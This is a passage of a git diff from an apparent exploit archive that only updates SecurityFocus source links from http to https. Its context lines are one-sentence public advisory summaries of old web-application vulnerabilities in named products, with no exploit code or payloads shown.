multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27683.txt b/exploits/cgi/webapps/27683.txt index 8084a756f..26d4274c0 100644 --- a/exploits/cgi/webapps/27683.txt +++ b/exploits/cgi/webapps/27683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17602/info +source: https://www.securityfocus.com/bid/17602/info CommuniMail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27685.txt b/exploits/cgi/webapps/27685.txt index 1f601f962..e5f877593 100644 --- a/exploits/cgi/webapps/27685.txt +++ b/exploits/cgi/webapps/27685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17605/info +source: https://www.securityfocus.com/bid/17605/info IntelliLink Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27686.txt b/exploits/cgi/webapps/27686.txt index 8ef683bc6..6749cbfdb 100644 --- a/exploits/cgi/webapps/27686.txt +++ b/exploits/cgi/webapps/27686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17605/info +source: https://www.securityfocus.com/bid/17605/info IntelliLink Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27689.txt b/exploits/cgi/webapps/27689.txt index 7775b309f..4d0e4d5b1 100644 --- a/exploits/cgi/webapps/27689.txt +++ b/exploits/cgi/webapps/27689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17613/info +source: https://www.securityfocus.com/bid/17613/info BannerFarm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27690.txt b/exploits/cgi/webapps/27690.txt index eb9826f4d..0580c600b 100644 --- a/exploits/cgi/webapps/27690.txt +++ b/exploits/cgi/webapps/27690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17614/info +source: https://www.securityfocus.com/bid/17614/info xFlow is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27691.txt b/exploits/cgi/webapps/27691.txt index 1e205356b..0fecd2704 100644 --- a/exploits/cgi/webapps/27691.txt +++ b/exploits/cgi/webapps/27691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17614/info +source: https://www.securityfocus.com/bid/17614/info xFlow is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27694.txt b/exploits/cgi/webapps/27694.txt index 144e06c58..628efd096 100644 --- a/exploits/cgi/webapps/27694.txt +++ b/exploits/cgi/webapps/27694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17621/info +source: https://www.securityfocus.com/bid/17621/info AWStats is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27695.txt b/exploits/cgi/webapps/27695.txt index 849882db5..20f55aa7a 100644 --- a/exploits/cgi/webapps/27695.txt +++ b/exploits/cgi/webapps/27695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17622/info +source: https://www.securityfocus.com/bid/17622/info Net Clubs Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27696.txt b/exploits/cgi/webapps/27696.txt index ed3c304b7..caddf7e93 100644 --- a/exploits/cgi/webapps/27696.txt +++ b/exploits/cgi/webapps/27696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17622/info +source: https://www.securityfocus.com/bid/17622/info Net Clubs Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27697.txt b/exploits/cgi/webapps/27697.txt index 2623fa758..2d3635d12 100644 --- a/exploits/cgi/webapps/27697.txt +++ b/exploits/cgi/webapps/27697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17622/info +source: https://www.securityfocus.com/bid/17622/info Net Clubs Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27712.txt b/exploits/cgi/webapps/27712.txt index 227f62681..da2cd6f1c 100644 --- a/exploits/cgi/webapps/27712.txt +++ b/exploits/cgi/webapps/27712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17628/info +source: https://www.securityfocus.com/bid/17628/info Portal Pack is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27728.txt b/exploits/cgi/webapps/27728.txt index d9846d27a..124870a61 100644 --- a/exploits/cgi/webapps/27728.txt +++ b/exploits/cgi/webapps/27728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17663/info +source: https://www.securityfocus.com/bid/17663/info Blender is susceptible to a Python code-execution vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in a Python 'eval' statement. diff --git a/exploits/cgi/webapps/27761.txt b/exploits/cgi/webapps/27761.txt index 23a68c0f0..ed6dd9923 100644 --- a/exploits/cgi/webapps/27761.txt +++ b/exploits/cgi/webapps/27761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17728/info +source: https://www.securityfocus.com/bid/17728/info NeoMail is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27895.txt b/exploits/cgi/webapps/27895.txt index 0843fe9d3..d233f697a 100644 --- a/exploits/cgi/webapps/27895.txt +++ b/exploits/cgi/webapps/27895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18024/info +source: https://www.securityfocus.com/bid/18024/info Cosmoshop is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cgi/webapps/28321.pl b/exploits/cgi/webapps/28321.pl index e66ca6c71..5261f62f9 100755 --- a/exploits/cgi/webapps/28321.pl +++ b/exploits/cgi/webapps/28321.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19276/info +source: https://www.securityfocus.com/bid/19276/info Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue. diff --git a/exploits/cgi/webapps/28514.txt b/exploits/cgi/webapps/28514.txt index 0b2a5495e..b20f77a8b 100644 --- a/exploits/cgi/webapps/28514.txt +++ b/exploits/cgi/webapps/28514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19960/info +source: https://www.securityfocus.com/bid/19960/info SQL-Ledger and LedgerSMB are prone to a remote directory-traversal vulnerability. diff --git a/exploits/cgi/webapps/28570.txt b/exploits/cgi/webapps/28570.txt index 0fa00884b..da0c6fecf 100644 --- a/exploits/cgi/webapps/28570.txt +++ b/exploits/cgi/webapps/28570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20021/info +source: https://www.securityfocus.com/bid/20021/info Mailman is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-input. These issues include multiple cross-site scripting vulnerabilities and a CRLF-injection vulnerability. diff --git a/exploits/cgi/webapps/29221.txt b/exploits/cgi/webapps/29221.txt index f58a12c28..8d5325dad 100644 --- a/exploits/cgi/webapps/29221.txt +++ b/exploits/cgi/webapps/29221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21419/info +source: https://www.securityfocus.com/bid/21419/info BlueSocket BSC 2100 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29275.txt b/exploits/cgi/webapps/29275.txt index 11aad10cd..648ad6e14 100644 --- a/exploits/cgi/webapps/29275.txt +++ b/exploits/cgi/webapps/29275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21534/info +source: https://www.securityfocus.com/bid/21534/info Netwin SurgeFTP is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29390.txt b/exploits/cgi/webapps/29390.txt index 146bb0deb..c80d833bc 100644 --- a/exploits/cgi/webapps/29390.txt +++ b/exploits/cgi/webapps/29390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29391.txt b/exploits/cgi/webapps/29391.txt index 7157c091a..5b48a386a 100644 --- a/exploits/cgi/webapps/29391.txt +++ b/exploits/cgi/webapps/29391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29392.txt b/exploits/cgi/webapps/29392.txt index 534cb911e..7ced55f69 100644 --- a/exploits/cgi/webapps/29392.txt +++ b/exploits/cgi/webapps/29392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29393.txt b/exploits/cgi/webapps/29393.txt index 9e2ea0d32..225a43275 100644 --- a/exploits/cgi/webapps/29393.txt +++ b/exploits/cgi/webapps/29393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29394.txt b/exploits/cgi/webapps/29394.txt index df2d02ebc..123fdbab0 100644 --- a/exploits/cgi/webapps/29394.txt +++ b/exploits/cgi/webapps/29394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21891/info +source: https://www.securityfocus.com/bid/21891/info EditTag is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29395.txt b/exploits/cgi/webapps/29395.txt index 59d2ac67f..f0a675e0b 100644 --- a/exploits/cgi/webapps/29395.txt +++ b/exploits/cgi/webapps/29395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21891/info +source: https://www.securityfocus.com/bid/21891/info EditTag is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29396.txt b/exploits/cgi/webapps/29396.txt index a7c0a8598..357985716 100644 --- a/exploits/cgi/webapps/29396.txt +++ b/exploits/cgi/webapps/29396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21891/info +source: https://www.securityfocus.com/bid/21891/info EditTag is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29623.txt b/exploits/cgi/webapps/29623.txt index b463a65e3..fd7542223 100644 --- a/exploits/cgi/webapps/29623.txt +++ b/exploits/cgi/webapps/29623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22650/info +source: https://www.securityfocus.com/bid/22650/info Google Desktop is prone to a cross-site scripting weakness because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29761.txt b/exploits/cgi/webapps/29761.txt index 5fd93a41e..17cd82674 100644 --- a/exploits/cgi/webapps/29761.txt +++ b/exploits/cgi/webapps/29761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23034/info +source: https://www.securityfocus.com/bid/23034/info LedgerSMB/SQL-Ledger are prone to a local file-include vulnerability because the application fails to sufficiently sanitize user-supplied input. SQL-Ledger is also prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/29842.txt b/exploits/cgi/webapps/29842.txt index e3f88957f..6a5dfb787 100644 --- a/exploits/cgi/webapps/29842.txt +++ b/exploits/cgi/webapps/29842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23422/info +source: https://www.securityfocus.com/bid/23422/info The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29844.txt b/exploits/cgi/webapps/29844.txt index 8d14fe164..5eb10c665 100644 --- a/exploits/cgi/webapps/29844.txt +++ b/exploits/cgi/webapps/29844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23424/info +source: https://www.securityfocus.com/bid/23424/info The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29962.txt b/exploits/cgi/webapps/29962.txt index 9f155b803..a495cd50d 100644 --- a/exploits/cgi/webapps/29962.txt +++ b/exploits/cgi/webapps/29962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23862/info +source: https://www.securityfocus.com/bid/23862/info OTRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30199.txt b/exploits/cgi/webapps/30199.txt index d79b79000..ccf24a4d6 100644 --- a/exploits/cgi/webapps/30199.txt +++ b/exploits/cgi/webapps/30199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24516/info +source: https://www.securityfocus.com/bid/24516/info WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30260.txt b/exploits/cgi/webapps/30260.txt index f1f7f457c..04d6755a3 100644 --- a/exploits/cgi/webapps/30260.txt +++ b/exploits/cgi/webapps/30260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24743/info +source: https://www.securityfocus.com/bid/24743/info Yoggie Pico and Pico Pro are prone to a remote code-execution vulnerability because the device fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30263.txt b/exploits/cgi/webapps/30263.txt index 832ea8dd1..2cf47003d 100644 --- a/exploits/cgi/webapps/30263.txt +++ b/exploits/cgi/webapps/30263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24754/info +source: https://www.securityfocus.com/bid/24754/info Oliver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30440.txt b/exploits/cgi/webapps/30440.txt index 40ec3d684..8b9f7d319 100644 --- a/exploits/cgi/webapps/30440.txt +++ b/exploits/cgi/webapps/30440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25148/info +source: https://www.securityfocus.com/bid/25148/info WebEvent is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30585.txt b/exploits/cgi/webapps/30585.txt index 4df5a6535..18c615457 100644 --- a/exploits/cgi/webapps/30585.txt +++ b/exploits/cgi/webapps/30585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25678/info +source: https://www.securityfocus.com/bid/25678/info Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/cgi/webapps/30586.txt b/exploits/cgi/webapps/30586.txt index 2f8962dc4..88befc935 100644 --- a/exploits/cgi/webapps/30586.txt +++ b/exploits/cgi/webapps/30586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25678/info +source: https://www.securityfocus.com/bid/25678/info Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/cgi/webapps/30587.txt b/exploits/cgi/webapps/30587.txt index cc7680561..72dbf97d1 100644 --- a/exploits/cgi/webapps/30587.txt +++ b/exploits/cgi/webapps/30587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25678/info +source: https://www.securityfocus.com/bid/25678/info Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/cgi/webapps/30591.txt b/exploits/cgi/webapps/30591.txt index 411ca0bde..8f5b77b57 100644 --- a/exploits/cgi/webapps/30591.txt +++ b/exploits/cgi/webapps/30591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25694/info +source: https://www.securityfocus.com/bid/25694/info Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data. diff --git a/exploits/cgi/webapps/30597.txt b/exploits/cgi/webapps/30597.txt index 16a9c933d..85b646b4b 100644 --- a/exploits/cgi/webapps/30597.txt +++ b/exploits/cgi/webapps/30597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25738/info +source: https://www.securityfocus.com/bid/25738/info The LevelOne WBR3404TX Broadband Router is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. These issues occurs in the web management panel. diff --git a/exploits/cgi/webapps/30598.txt b/exploits/cgi/webapps/30598.txt index 71cf584db..b20faaef7 100644 --- a/exploits/cgi/webapps/30598.txt +++ b/exploits/cgi/webapps/30598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25744/info +source: https://www.securityfocus.com/bid/25744/info WebBatch is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30599.txt b/exploits/cgi/webapps/30599.txt index d57c86d4d..fac01ff9a 100644 --- a/exploits/cgi/webapps/30599.txt +++ b/exploits/cgi/webapps/30599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25744/info +source: https://www.securityfocus.com/bid/25744/info WebBatch is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30606.txt b/exploits/cgi/webapps/30606.txt index a25c4d381..cc8bb7f1e 100644 --- a/exploits/cgi/webapps/30606.txt +++ b/exploits/cgi/webapps/30606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25788/info +source: https://www.securityfocus.com/bid/25788/info Urchin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30639.txt b/exploits/cgi/webapps/30639.txt index 094498b29..40aa68901 100644 --- a/exploits/cgi/webapps/30639.txt +++ b/exploits/cgi/webapps/30639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25928/info +source: https://www.securityfocus.com/bid/25928/info Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30649.txt b/exploits/cgi/webapps/30649.txt index ee251d265..c569f4799 100644 --- a/exploits/cgi/webapps/30649.txt +++ b/exploits/cgi/webapps/30649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25981/info +source: https://www.securityfocus.com/bid/25981/info DNews is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30661.txt b/exploits/cgi/webapps/30661.txt index 8e075fc0f..2bb10df2e 100644 --- a/exploits/cgi/webapps/30661.txt +++ b/exploits/cgi/webapps/30661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26037/info +source: https://www.securityfocus.com/bid/26037/info Google Urchin is prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/30759.txt b/exploits/cgi/webapps/30759.txt index 9f8fd6a97..88b136344 100644 --- a/exploits/cgi/webapps/30759.txt +++ b/exploits/cgi/webapps/30759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26419/info +source: https://www.securityfocus.com/bid/26419/info Web Gateway is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30770.txt b/exploits/cgi/webapps/30770.txt index beec7e91d..2a2515451 100644 --- a/exploits/cgi/webapps/30770.txt +++ b/exploits/cgi/webapps/30770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26464/info +source: https://www.securityfocus.com/bid/26464/info AIDA Web is prone to multiple unauthorized access vulnerabilities. diff --git a/exploits/cgi/webapps/30777.txt b/exploits/cgi/webapps/30777.txt index 30548e2c8..cd638ad73 100644 --- a/exploits/cgi/webapps/30777.txt +++ b/exploits/cgi/webapps/30777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26491/info +source: https://www.securityfocus.com/bid/26491/info Citrix NetScaler is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30795.txt b/exploits/cgi/webapps/30795.txt index bb3141c03..f5a14f827 100644 --- a/exploits/cgi/webapps/30795.txt +++ b/exploits/cgi/webapps/30795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26525/info +source: https://www.securityfocus.com/bid/26525/info GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30808.txt b/exploits/cgi/webapps/30808.txt index e5f3b7837..44308501c 100644 --- a/exploits/cgi/webapps/30808.txt +++ b/exploits/cgi/webapps/30808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26582/info +source: https://www.securityfocus.com/bid/26582/info GWExtranet is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/30818.txt b/exploits/cgi/webapps/30818.txt index 42fe55979..33c2dfe46 100644 --- a/exploits/cgi/webapps/30818.txt +++ b/exploits/cgi/webapps/30818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26610/info +source: https://www.securityfocus.com/bid/26610/info ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/30919.txt b/exploits/cgi/webapps/30919.txt index 4f08c9084..9bf2faad9 100644 --- a/exploits/cgi/webapps/30919.txt +++ b/exploits/cgi/webapps/30919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26963/info +source: https://www.securityfocus.com/bid/26963/info SiteScape Forum is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30975.txt b/exploits/cgi/webapps/30975.txt index 4bccfef36..15345cbb7 100644 --- a/exploits/cgi/webapps/30975.txt +++ b/exploits/cgi/webapps/30975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27116/info +source: https://www.securityfocus.com/bid/27116/info W3-mSQL is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31025.txt b/exploits/cgi/webapps/31025.txt index d99b19046..b29a9e8f4 100644 --- a/exploits/cgi/webapps/31025.txt +++ b/exploits/cgi/webapps/31025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27273/info +source: https://www.securityfocus.com/bid/27273/info Garment Center is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31043.txt b/exploits/cgi/webapps/31043.txt index 731945182..b67787c23 100644 --- a/exploits/cgi/webapps/31043.txt +++ b/exploits/cgi/webapps/31043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27374/info +source: https://www.securityfocus.com/bid/27374/info Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/cgi/webapps/31071.txt b/exploits/cgi/webapps/31071.txt index 54d540f2c..5b7628238 100644 --- a/exploits/cgi/webapps/31071.txt +++ b/exploits/cgi/webapps/31071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27475/info +source: https://www.securityfocus.com/bid/27475/info VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31081.txt b/exploits/cgi/webapps/31081.txt index 1755d3d57..4cfda62f1 100644 --- a/exploits/cgi/webapps/31081.txt +++ b/exploits/cgi/webapps/31081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27535/info +source: https://www.securityfocus.com/bid/27535/info OpenBSD bgplg is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31313.txt b/exploits/cgi/webapps/31313.txt index ce549511d..25e7c40b4 100644 --- a/exploits/cgi/webapps/31313.txt +++ b/exploits/cgi/webapps/31313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28037/info +source: https://www.securityfocus.com/bid/28037/info Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability. diff --git a/exploits/cgi/webapps/31411.txt b/exploits/cgi/webapps/31411.txt index d828a875e..c309833bf 100644 --- a/exploits/cgi/webapps/31411.txt +++ b/exploits/cgi/webapps/31411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28277/info +source: https://www.securityfocus.com/bid/28277/info RSA WebID is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31466.txt b/exploits/cgi/webapps/31466.txt index 43e583402..6bd1a0be6 100644 --- a/exploits/cgi/webapps/31466.txt +++ b/exploits/cgi/webapps/31466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28393/info +source: https://www.securityfocus.com/bid/28393/info Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31537.txt b/exploits/cgi/webapps/31537.txt index 3bed6e724..7e1cf5214 100644 --- a/exploits/cgi/webapps/31537.txt +++ b/exploits/cgi/webapps/31537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28455/info +source: https://www.securityfocus.com/bid/28455/info Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31538.txt b/exploits/cgi/webapps/31538.txt index 669f43959..c7c6f521d 100644 --- a/exploits/cgi/webapps/31538.txt +++ b/exploits/cgi/webapps/31538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28455/info +source: https://www.securityfocus.com/bid/28455/info Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31754.txt b/exploits/cgi/webapps/31754.txt index 6d5e2388a..e55ae06fb 100644 --- a/exploits/cgi/webapps/31754.txt +++ b/exploits/cgi/webapps/31754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29103/info +source: https://www.securityfocus.com/bid/29103/info SAP Internet Transaction Server is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31755.txt b/exploits/cgi/webapps/31755.txt index f9b29c3f4..8b3cac2e4 100644 --- a/exploits/cgi/webapps/31755.txt +++ b/exploits/cgi/webapps/31755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29103/info +source: https://www.securityfocus.com/bid/29103/info SAP Internet Transaction Server is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31892.txt b/exploits/cgi/webapps/31892.txt index a1c906b3b..cbc2ea429 100644 --- a/exploits/cgi/webapps/31892.txt +++ b/exploits/cgi/webapps/31892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29626/info +source: https://www.securityfocus.com/bid/29626/info Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/32094.pl b/exploits/cgi/webapps/32094.pl index 18403d692..62a6a41ee 100755 --- a/exploits/cgi/webapps/32094.pl +++ b/exploits/cgi/webapps/32094.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30320/info +source: https://www.securityfocus.com/bid/30320/info HiFriend is prone to an open-email-relay vulnerability. diff --git a/exploits/cgi/webapps/32258.txt b/exploits/cgi/webapps/32258.txt index ca80c7e3e..8818d4e92 100644 --- a/exploits/cgi/webapps/32258.txt +++ b/exploits/cgi/webapps/32258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30730/info +source: https://www.securityfocus.com/bid/30730/info AWStats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/32430.txt b/exploits/cgi/webapps/32430.txt index 4111724fc..2b414e815 100644 --- a/exploits/cgi/webapps/32430.txt +++ b/exploits/cgi/webapps/32430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31436/info +source: https://www.securityfocus.com/bid/31436/info WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/32734.txt b/exploits/cgi/webapps/32734.txt index f88e4af80..652da0278 100644 --- a/exploits/cgi/webapps/32734.txt +++ b/exploits/cgi/webapps/32734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33312/info +source: https://www.securityfocus.com/bid/33312/info LemonLDAP:NG is prone to a user-enumeration weakness and a cross-site scripting vulnerability. diff 